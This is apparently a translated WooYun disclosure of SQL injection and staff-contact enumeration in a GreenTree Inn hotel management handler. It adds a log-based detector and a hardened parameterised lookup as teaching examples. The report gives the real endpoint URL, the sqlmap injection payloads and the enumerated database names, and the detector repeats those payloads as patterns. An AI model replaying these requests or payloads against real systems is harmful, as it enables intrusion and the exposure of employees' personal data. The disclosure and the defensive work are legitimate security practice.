Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0127316

Title: SQL injection vulnerability in a GreenTree Inn hotel system

Vendor: GreenTree Inns Hotel Management Group (格林豪泰酒店管理集团)

Author: 浮萍

Submitted: 2015-07-19 22:55

Fixed: 2015-09-04 09:32

Disclosed: 2015-09-04 09:32

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-19: Details sent to the vendor; awaiting vendor action
2015-07-21: Vendor confirmed; details visible to the vendor only
2015-07-31: Details disclosed to core white hats and domain experts
2015-08-10: Details disclosed to regular white hats
2015-08-20: Details disclosed to intern white hats
2015-09-04: Details disclosed to the public

Brief description:

SQL injection
Enumeration leaking personal information

Detailed description:

http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019&n=%E6%A0%BC%E6%9E%97%E8%B1%AA%E6%B3%B0%E4%B8%8A%E6%B5%B7%E9%95%BF%E9%98%B3%E8%B7%AF%E6%B1%9F%E6%B5%A6%E5%85%AC%E5%9B%AD%E5%9C%B0%E9%93%81%E7%AB%99%E5%95%86%E5%8A%A1%E9%85%92%E5%BA%97

[Screenshot: Snap42.jpg]


The response shows mobile phone numbers, email addresses and names.
Requesting http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019 with only the s parameter returns the same data.

[Screenshot: Snap43.jpg]


Changing the value of the s parameter, for example http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=0210,
allows the records to be enumerated.

[Screenshot: Snap45.jpg]


Next, testing for injection:

GET parameter 's' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: s
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: s=021%' AND 4632=4632 AND '%'='

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: s=-6630%' OR 5380=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---


web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
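The sqlmap output above is the attacker's view of the handler; the defender's counterpart is to recognise the same probes in the web server's access logs. The detector below is an added example written for this page, not code from the report or from GreenTree's systems. It assumes a simplified, constructed log layout (date, time, method, path, raw query string, client IP, status) and derives its indicators from the two payloads sqlmap reported: a closing quote followed by AND or OR, the N=N tautology of the boolean-based blind probe, and the sysusers self-join of the Microsoft SQL Server time-based heavy query. It also flags a client that requests many distinct s values, which is the enumeration described earlier. The sample log lines, the handler path match and the enumeration threshold are assumptions, not values taken from a real log.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Path of the handler named in the report.
HANDLER = "/GreenTreeInn/MIS/AddressBook_Hotel.ashx"

# Indicators derived from the payloads sqlmap reported on this page.
PATTERNS = {
    # closing quote followed by a boolean operator:  %' AND ...  /  %' OR ...
    "quote_breakout": re.compile(r"'\s*(AND|OR)\b", re.IGNORECASE),
    # N=N tautology used by the boolean-based blind probe (4632=4632)
    "tautology": re.compile(r"\b(\d+)\s*=\s*\1\b"),
    # sysusers self-join used by the MSSQL time-based "heavy query" probe
    "heavy_query": re.compile(r"FROM\s+sysusers\s+AS\s+\w+\s*,\s*sysusers", re.IGNORECASE),
}

# Constructed, simplified log layout (an assumption, not a real IIS/W3C format):
# date time method path raw-query client-ip status
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

# Constructed sample lines: one ordinary lookup, then a client that walks
# short prefixes and sends the two probe shapes from the report (the heavy
# query is shortened to two self-joins), then an unrelated request.
LOG_LINES = [
    "2015-07-19 22:40:01 GET /GreenTreeInn/MIS/AddressBook_Hotel.ashx s=021019 198.51.100.7 200",
    "2015-07-19 22:40:09 GET /GreenTreeInn/MIS/AddressBook_Hotel.ashx s=0210 203.0.113.5 200",
    "2015-07-19 22:40:10 GET /GreenTreeInn/MIS/AddressBook_Hotel.ashx s=0211 203.0.113.5 200",
    "2015-07-19 22:40:11 GET /GreenTreeInn/MIS/AddressBook_Hotel.ashx s=0212 203.0.113.5 200",
    "2015-07-19 22:40:12 GET /GreenTreeInn/MIS/AddressBook_Hotel.ashx s=021%25%27+AND+4632%3D4632+AND+%27%25%27%3D%27 203.0.113.5 200",
    "2015-07-19 22:40:13 GET /GreenTreeInn/MIS/AddressBook_Hotel.ashx s=-6630%25%27+OR+5380%3D(SELECT+COUNT(*)+FROM+sysusers+AS+sys1,sysusers+AS+sys2)+AND+%27%25%27%3D%27 203.0.113.5 200",
    "2015-07-19 22:41:00 GET /GreenTreeInn/MIS/Other.ashx - 192.0.2.9 404",
]


def parse_line(line):
    """Split one constructed log line into fields; return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    date, time, method, path, query, ip, status = m.groups()
    return {"ts": f"{date} {time}", "method": method, "path": path,
            "query": "" if query == "-" else query, "ip": ip, "status": int(status)}


def classify(raw_query):
    """Names of the injection indicators present in the decoded s parameter(s)."""
    hits = set()
    # parse_qs performs the URL decoding once, so the patterns see the literal SQL.
    for value in parse_qs(raw_query, keep_blank_values=True).get("s", []):
        for name, pattern in PATTERNS.items():
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


def scan(lines, handler=HANDLER, enum_threshold=3):
    """Aggregate per client IP and return one alert per client worth looking at."""
    per_ip = defaultdict(lambda: {"requests": 0, "distinct_s": set(), "indicators": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != handler:
            continue
        state = per_ip[rec["ip"]]
        state["requests"] += 1
        for value in parse_qs(rec["query"], keep_blank_values=True).get("s", []):
            state["distinct_s"].add(value)
        state["indicators"].update(classify(rec["query"]))

    alerts = []
    for ip, state in per_ip.items():
        reasons = sorted(state["indicators"])
        # Many different hotel codes from one client is the enumeration pattern.
        if len(state["distinct_s"]) >= enum_threshold:
            reasons.append("enumeration")
        if reasons:
            alerts.append({"ip": ip, "requests": state["requests"], "reasons": reasons})
    return sorted(alerts, key=lambda a: a["ip"])


if __name__ == "__main__":
    for alert in scan(LOG_LINES):
        print(alert)
```

Run against the constructed lines, the benign client with a single exact code produces no alert, while the second client is reported with all three payload indicators plus the enumeration flag. The threshold of three distinct codes is a deliberately low starting point for a directory that a given hotel should only ever query for itself; tune it to the real access pattern before alerting on it.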


Databases:

available databases [15]:
[*] BPM
[*] eHR20131110
[*] eHR20140303
[*] eHR20141029
[*] eHR20150705
[*] eHR_DB
[*] eHR_History
[*] FlowER_History
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZKTime


I did not go on to dump the tables.

[Screenshot: Snap47.jpg]
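The report shows two separate defects in AddressBook_Hotel.ashx: the s value is used as a prefix match with no check that the caller may see that hotel, so a shorter value enumerates other hotels' staff, and it is concatenated into the SQL text, so a quote breaks out of the string literal and the boolean-based and time-based payloads change the query. The following is an added example, not the vendor's code: a Python stand-in for the lookup with an in-memory sqlite3 database in place of SQL Server 2008, showing the vulnerable pattern beside a hardened one that closes both holes. The table layout, the six-digit hotel-code format, the rule that a caller may only read their own hotel's directory, and the sample contacts are all constructed assumptions.

```python
import re
import sqlite3

# Constructed sample directory; every name, number and address is invented.
CONTACTS = [
    ("021019", "Contact A", "13800000001", "a@example.com"),
    ("021020", "Contact B", "13800000002", "b@example.com"),
    ("021099", "Contact C", "13800000003", "c@example.com"),
    ("010001", "Contact D", "13800000004", "d@example.com"),
]


def make_db():
    """In-memory sqlite3 stand-in for the SQL Server 2008 back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (hotel_code TEXT, name TEXT, phone TEXT, email TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?, ?, ?, ?)", CONTACTS)
    return conn


def lookup_vulnerable(conn, s):
    """Mirrors what the findings imply: s is pasted into a LIKE pattern.

    A short value (s=0210) matches every hotel sharing that prefix, and a
    quote inside s rewrites the WHERE clause, which is what the boolean-based
    blind payload in the report relies on.
    """
    sql = ("SELECT name, phone, email FROM contacts "
           "WHERE hotel_code LIKE '" + s + "%'")
    return conn.execute(sql).fetchall()


# Assumed identifier format: a complete six-digit hotel code and nothing else.
HOTEL_CODE = re.compile(r"[0-9]{6}")


def lookup_hardened(conn, s, caller_hotel_code):
    """Return ("ok", rows) or ("rejected", reason).

    Three layers, each of which on its own defeats one step of the report:
    strict input validation, an authorisation check tying the requested code
    to the caller, and a parameterised exact-match query with no string
    concatenation and no prefix matching.
    """
    if not HOTEL_CODE.fullmatch(s):
        return ("rejected", "invalid hotel code")
    if s != caller_hotel_code:
        return ("rejected", "not authorised for this hotel")
    rows = conn.execute(
        "SELECT name, phone, email FROM contacts WHERE hotel_code = ?", (s,)
    ).fetchall()
    return ("ok", rows)


def demonstrate():
    """Replay the report's requests against both implementations."""
    conn = make_db()
    probe = "021%' AND 4632=4632 AND '%'='"   # boolean-based payload quoted in the report
    return {
        "vulnerable_row_counts": {
            "s=021019": len(lookup_vulnerable(conn, "021019")),
            "s=0210": len(lookup_vulnerable(conn, "0210")),
            "probe": len(lookup_vulnerable(conn, probe)),
        },
        "hardened_outcomes": {
            "s=021019": lookup_hardened(conn, "021019", "021019")[0],
            "s=0210": lookup_hardened(conn, "0210", "021019")[1],
            "probe": lookup_hardened(conn, probe, "021019")[1],
            "other hotel": lookup_hardened(conn, "021020", "021019")[1],
        },
    }


if __name__ == "__main__":
    import json
    print(json.dumps(demonstrate(), indent=2))
```

On the constructed data the vulnerable lookup returns one row for the full code, three rows for the four-digit prefix, and three rows for the boolean probe (the injected condition is true, so the query still matches the prefix), which is the observable difference a blind-injection tool measures. The hardened lookup rejects the prefix and the probe before any SQL runs, rejects a well-formed code belonging to a different hotel, and serves only the caller's own directory through a bound parameter.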


Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit the source: 浮萍@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 5

Confirmed: 2015-07-21 09:30

Vendor reply:

Thank you for your attention to GreenTree; this has been handled...

Latest status:

None yet